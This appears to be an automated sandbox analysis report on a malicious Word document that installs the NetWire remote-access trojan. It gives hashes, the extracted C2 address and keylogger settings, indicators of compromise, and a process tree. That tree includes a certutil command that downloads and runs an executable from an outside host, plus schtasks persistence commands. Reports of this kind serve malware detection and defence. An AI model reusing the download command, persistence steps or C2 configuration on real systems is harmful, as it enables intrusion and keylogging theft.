Analysis
-
max time kernel
102s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2022 09:25
Behavioral task
behavioral1
Sample
RFQ 80479040.doc
Resource
win7-20220812-en
General
-
Target
RFQ 80479040.doc
-
Size
62KB
-
MD5
31c3a3ef341ada198075d57bf07cc03d
-
SHA1
d8ee2ef6d1066ce0fd1f95784c4381374d890adf
-
SHA256
b995f53ac55eb6ce01af25e1cc21f26bf182aaf97e7c09be062250bf8e5df4b6
-
SHA512
a00412dd6ecaa738b6a7c58b76e578bba9ae7fca4b475667fa6198822f094b88b253938fb9d8f5eb94a1da0fd0f84c513cbab52c06dbcaf0e39520b217301b42
-
SSDEEP
384:OkUgY5j96eYPKNiaI1WAE7OCb8iSUR/8dEv8krqrf4INzte/DZeIESy3uGjGWi2S:OP5I5I/q/qsfZ3qHGjG/owKSqXI
Malware Config
Extracted
netwire
37.0.14.206:3384
-
activex_autorun
false
-
copy_executable
true
-
delete_original
false
-
host_id
HostId-%Rand%
-
install_path
%AppData%\Install\Host.exe
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
true
-
offline_keylogger
true
-
password
Password234
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/540-151-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/540-154-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/540-155-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/2988-167-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/2988-168-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/2988-169-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
certutil.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3104 2352 certutil.exe WINWORD.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
WinUpdate.exeWinUpdate.exeHost.exeHost.exeHost.exepid process 220 WinUpdate.exe 540 WinUpdate.exe 2604 Host.exe 2308 Host.exe 2988 Host.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WinUpdate.exeWinUpdate.exeHost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WinUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WinUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Host.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
WinUpdate.exeHost.exedescription pid process target process PID 220 set thread context of 540 220 WinUpdate.exe WinUpdate.exe PID 2604 set thread context of 2988 2604 Host.exe Host.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3024 schtasks.exe 4540 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2352 WINWORD.EXE 2352 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
WinUpdate.exeHost.exepid process 220 WinUpdate.exe 2604 Host.exe 2604 Host.exe 2604 Host.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
WinUpdate.exeHost.exedescription pid process Token: SeDebugPrivilege 220 WinUpdate.exe Token: SeDebugPrivilege 2604 Host.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2352 WINWORD.EXE 2352 WINWORD.EXE 2352 WINWORD.EXE 2352 WINWORD.EXE 2352 WINWORD.EXE 2352 WINWORD.EXE 2352 WINWORD.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
WINWORD.EXEWinUpdate.exeWinUpdate.exeHost.exedescription pid process target process PID 2352 wrote to memory of 3104 2352 WINWORD.EXE certutil.exe PID 2352 wrote to memory of 3104 2352 WINWORD.EXE certutil.exe PID 2352 wrote to memory of 220 2352 WINWORD.EXE WinUpdate.exe PID 2352 wrote to memory of 220 2352 WINWORD.EXE WinUpdate.exe PID 2352 wrote to memory of 220 2352 WINWORD.EXE WinUpdate.exe PID 220 wrote to memory of 3024 220 WinUpdate.exe schtasks.exe PID 220 wrote to memory of 3024 220 WinUpdate.exe schtasks.exe PID 220 wrote to memory of 3024 220 WinUpdate.exe schtasks.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 220 wrote to memory of 540 220 WinUpdate.exe WinUpdate.exe PID 540 wrote to memory of 2604 540 WinUpdate.exe Host.exe PID 540 wrote to memory of 2604 540 WinUpdate.exe Host.exe PID 540 wrote to memory of 2604 540 WinUpdate.exe Host.exe PID 2604 wrote to memory of 4540 2604 Host.exe schtasks.exe PID 2604 wrote to memory of 4540 2604 Host.exe schtasks.exe PID 2604 wrote to memory of 4540 2604 Host.exe schtasks.exe PID 2604 wrote to memory of 2308 2604 Host.exe Host.exe PID 2604 wrote to memory of 2308 2604 Host.exe Host.exe PID 2604 wrote to memory of 2308 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe PID 2604 wrote to memory of 2988 2604 Host.exe Host.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ 80479040.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\certutil.exe"C:\Windows\System32\certutil.exe" -urlcache -split -f https://teqturn.com/goblin/ea05f1fD14F2Jju.exe C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe2⤵
- Process spawned unexpected child process
-
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1146.tmp"3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"{path}"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Install\Host.exe"C:\Users\Admin\AppData\Roaming\Install\Host.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7BC7.tmp"5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Install\Host.exe"{path}"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Install\Host.exe"{path}"5⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exeFilesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exeFilesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exeFilesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
C:\Users\Admin\AppData\Local\Temp\tmp1146.tmpFilesize
1KB
MD565f892aa7144c7be9e9f0a64060f5f79
SHA133d937d86129a4c23affae32947812eb136fdacb
SHA256fae46df3949c6dc59024f3dfbb59c659f1ea3f1ee8f6577a86da8f61af455d3c
SHA51256585dce966d86b92a31e3384fe406b29a267da169efd8687552d3b927ddadb92579f83297866aeea394ac6c46abb3bd6cce605e9bd66c50091ff066024aca0f
-
C:\Users\Admin\AppData\Local\Temp\tmp7BC7.tmpFilesize
1KB
MD565f892aa7144c7be9e9f0a64060f5f79
SHA133d937d86129a4c23affae32947812eb136fdacb
SHA256fae46df3949c6dc59024f3dfbb59c659f1ea3f1ee8f6577a86da8f61af455d3c
SHA51256585dce966d86b92a31e3384fe406b29a267da169efd8687552d3b927ddadb92579f83297866aeea394ac6c46abb3bd6cce605e9bd66c50091ff066024aca0f
-
C:\Users\Admin\AppData\Roaming\Install\Host.exeFilesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
C:\Users\Admin\AppData\Roaming\Install\Host.exeFilesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
C:\Users\Admin\AppData\Roaming\Install\Host.exeFilesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
C:\Users\Admin\AppData\Roaming\Install\Host.exeFilesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
memory/220-141-0x0000000000000000-mapping.dmp
-
memory/220-143-0x0000000000190000-0x0000000000272000-memory.dmpFilesize
904KB
-
memory/220-144-0x00000000051F0000-0x0000000005794000-memory.dmpFilesize
5.6MB
-
memory/220-145-0x0000000004C40000-0x0000000004CD2000-memory.dmpFilesize
584KB
-
memory/220-146-0x0000000004CE0000-0x0000000004D7C000-memory.dmpFilesize
624KB
-
memory/220-147-0x00000000057B0000-0x00000000057BA000-memory.dmpFilesize
40KB
-
memory/540-154-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/540-155-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/540-150-0x0000000000000000-mapping.dmp
-
memory/540-151-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/2308-161-0x0000000000000000-mapping.dmp
-
memory/2352-133-0x00007FFE319B0000-0x00007FFE319C0000-memory.dmpFilesize
64KB
-
memory/2352-134-0x00007FFE319B0000-0x00007FFE319C0000-memory.dmpFilesize
64KB
-
memory/2352-174-0x00007FFE319B0000-0x00007FFE319C0000-memory.dmpFilesize
64KB
-
memory/2352-173-0x00007FFE319B0000-0x00007FFE319C0000-memory.dmpFilesize
64KB
-
memory/2352-137-0x00007FFE2F100000-0x00007FFE2F110000-memory.dmpFilesize
64KB
-
memory/2352-136-0x00007FFE319B0000-0x00007FFE319C0000-memory.dmpFilesize
64KB
-
memory/2352-172-0x00007FFE319B0000-0x00007FFE319C0000-memory.dmpFilesize
64KB
-
memory/2352-135-0x00007FFE319B0000-0x00007FFE319C0000-memory.dmpFilesize
64KB
-
memory/2352-171-0x00007FFE319B0000-0x00007FFE319C0000-memory.dmpFilesize
64KB
-
memory/2352-138-0x00007FFE2F100000-0x00007FFE2F110000-memory.dmpFilesize
64KB
-
memory/2352-132-0x00007FFE319B0000-0x00007FFE319C0000-memory.dmpFilesize
64KB
-
memory/2604-156-0x0000000000000000-mapping.dmp
-
memory/2988-163-0x0000000000000000-mapping.dmp
-
memory/2988-167-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/2988-168-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/2988-169-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/3024-148-0x0000000000000000-mapping.dmp
-
memory/3104-139-0x0000000000000000-mapping.dmp
-
memory/4540-159-0x0000000000000000-mapping.dmp